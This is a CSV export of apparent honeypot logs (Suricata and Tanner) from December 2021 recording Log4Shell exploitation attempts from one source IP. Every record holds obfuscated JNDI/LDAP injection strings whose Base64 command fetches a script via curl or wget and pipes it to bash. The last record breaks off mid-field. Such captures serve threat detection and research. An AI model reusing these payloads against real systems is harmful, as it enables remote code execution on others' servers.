"2021-12-14T21:59:26.166Z",1,"unD-un0B6VkG8jKzSmhJ","logstash-suricata-2021.12.14",,"_doc","9d8bfd88-f1e7-40b2-ade3-b92ae9c6ff06",877d18bea7b8,"948e4716-3335-4441-998e-60ce507eeac2",877d18bea7b8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1355811984962298,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,877d18bea7b8,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",50008925,,"{""timestamp"":""2021-12-14T21:59:26.166438+0000"",""flow_id"":1355811984962298,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":54758,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yNy4xOTo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",54758,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:59:26.166438+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:58:51.629Z",1,"8XD-un0B6VkG8jKzOFne","logstash-suricata-2021.12.14",,"_doc","ae6baa6b-0d71-44b0-a208-574f60a18faf",5d60de9b3a83,"4bd08fd7-b333-41d4-9926-e7f75c77ff65",5d60de9b3a83,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1731409020179278,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5d60de9b3a83,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",73250374,,"{""timestamp"":""2021-12-14T21:58:51.629204+0000"",""flow_id"":1731409020179278,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":45186,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MHx8d2dldCAtcSAtTy0gMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzguMTk3LjE2OC4yNDI6ODA4MCl8YmFzaA==}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",45186,,,,,,,,,,,,nuttyhomework,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:58:51.629204+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:56:29.640Z",1,"gaL-un0BCXMCNTQLSQM7","logstash-suricata-2021.12.14",,"_doc","9d8bfd88-f1e7-40b2-ade3-b92ae9c6ff06",877d18bea7b8,"948e4716-3335-4441-998e-60ce507eeac2",877d18bea7b8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1630904628613312,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,877d18bea7b8,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",1904,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49989926,,"{""timestamp"":""2021-12-14T21:56:29.640632+0000"",""flow_id"":1630904628613312,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":59998,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",59998,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:56:29.640632+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:56:29.640Z",1,"gqL-un0BCXMCNTQLSQM7","logstash-suricata-2021.12.14",,"_doc","9d8bfd88-f1e7-40b2-ade3-b92ae9c6ff06",877d18bea7b8,"948e4716-3335-4441-998e-60ce507eeac2",877d18bea7b8,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"195.54.160.149",59998,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, ASCII text",06f7362b70fa8873a17bc8c48df1056f,"[]",1904,CLOSED,false,0,,,,,,,1630904628613312,,,London,EU,GB,GB,"United Kingdom",,"172.16.0.42","51.5353","{""lon"":-0.6658,""lat"":51.5353}","-0.6658",SL1,ENG,England,"Europe/London",,,,,,,,,,,,,,,877d18bea7b8,,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",1904,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",49991037,,"{""timestamp"":""2021-12-14T21:56:29.640632+0000"",""flow_id"":1630904628613312,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""195.54.160.149"",""dest_port"":59998,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_content_type"":""text/html"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":1904},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""06f7362b70fa8873a17bc8c48df1056f"",""stored"":false,""size"":1904,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,loudwheel,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:56:29.640632+0000",,,,,,,,,Suricata,,,,
"2021-12-14T21:56:29.585Z",1,"Tw3-un0B5e7x5EYnSaKQ","logstash-tanner-2021.12.14",,"_doc","9d8bfd88-f1e7-40b2-ade3-b92ae9c6ff06",877d18bea7b8,"948e4716-3335-4441-998e-60ce507eeac2",877d18bea7b8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,gzip,,,close,,,"172.16.0.42:80","${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}","${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,877d18bea7b8,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",88711,,"{""method"": ""GET"", ""path"": ""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"", ""headers"": {""host"": ""172.16.0.42:80"", ""user-agent"": ""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"", ""referer"": ""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}"", ""accept-encoding"": ""gzip"", ""connection"": ""close""}, ""uuid"": ""c33229bf-85cf-4304-a76d-fe8ea7874c56"", ""peer"": {""ip"": ""195.54.160.149"", ""port"": 59998}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""b21b1852-eb39-4aa5-99b1-f9ce9c2cc0af""}}}, ""timestamp"": ""2021-12-14T21:56:29.585501""}",,,,,,GET,,,,,,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI3LjE5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzEzNC4yMDkuMjcuMTk6ODApfGJhc2g=}",,,,,,,,,,,index,1,1,"0.6.0","b21b1852-eb39-4aa5-99b1-f9ce9c2cc0af","0.6.0",,,,,,,,,,,,,,,,,,"195.54.160.149",59998,,,,,,,,,200,,,loudwheel,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:56:29.585501",,,,,,,,,Tanner,,,"c33229bf-85cf-4304-a76d-fe8ea7874c56",
"2021-12-14T21:54:36.930Z",1,"uaH-un0BCXMCNTQLP_qT","logstash-suricata-2021.12.14",,"_doc","be4f014d-3826-40b1-8d6f-62f56ed1024b",2c4f3c6153a8,"2fc0c8f9-449c-4f91-96aa-c28f4acb3f85",2c4f3c6153a8,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,142127222302116,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,2c4f3c6153a8,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",29518611,,"{""timestamp"":""2021-12-14T21:54:36.930960+0000"",""flow_id"":142127222302116,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":44604,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xMzQuMjA5LjI5LjQ0OjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTM0LjIwOS4yOS40NDo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",44604,,,,,,,,,,,,disturbedyoung,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:54:36.930960+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:51:06.074Z",1,ZHDtun0B6VkG8jKzlTQq,"logstash-suricata-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",8080,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,781007888923340,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0ec2be0d4512,gzip,,,,"172.16.0.42",,GET,8080,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}",0,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",31046444,,"{""timestamp"":""2021-12-14T21:51:06.074803+0000"",""flow_id"":781007888923340,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":52354,""dest_ip"":""172.16.0.42"",""dest_port"":8080,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":8080,""url"":""/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}"",""http_user_agent"":""${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}"",""accept_encoding"":""gzip"",""http_refer"":""${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTY3LjcxLjE4NC41Mzo4MDgwKXxiYXNo}"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"195.54.160.149",52354,,,,,,,,,,,,inherentfocus,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-14T21:51:06.074803+0000",,,,,,,,0,Suricata,,,,
"2021-12-14T21:48:33.955Z",1,1KHrun0BCXMCNTQLO8ey,"logstash-suricata-2021.12.14",,"_doc","445b199a-9932-481e-bb91-55eeb7bcdd09",0ec2be0d4512,"a397defb-6fa3-487d-9801-6db484692ca1",0ec2be0d4512,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1364970959874847,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0ec2be0d4512,gzip,,,,"172.16.0.42","text/html",GET,80,"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,,,,"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",10803,"HTTP/1.1",200,"/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNjcuNzEuMTg0LjUzOjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzE2Ny43MS4xODQuNTM6ODApfGJhc2g=}",,,,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",31041632,,"{""timestamp"":""2021-12-14T21:48:33.955875+0000"",""flow_id"":1364970959874847,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""195.54.160.149"",""src_port"":38946,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""http_port"":80,""url"":""/?x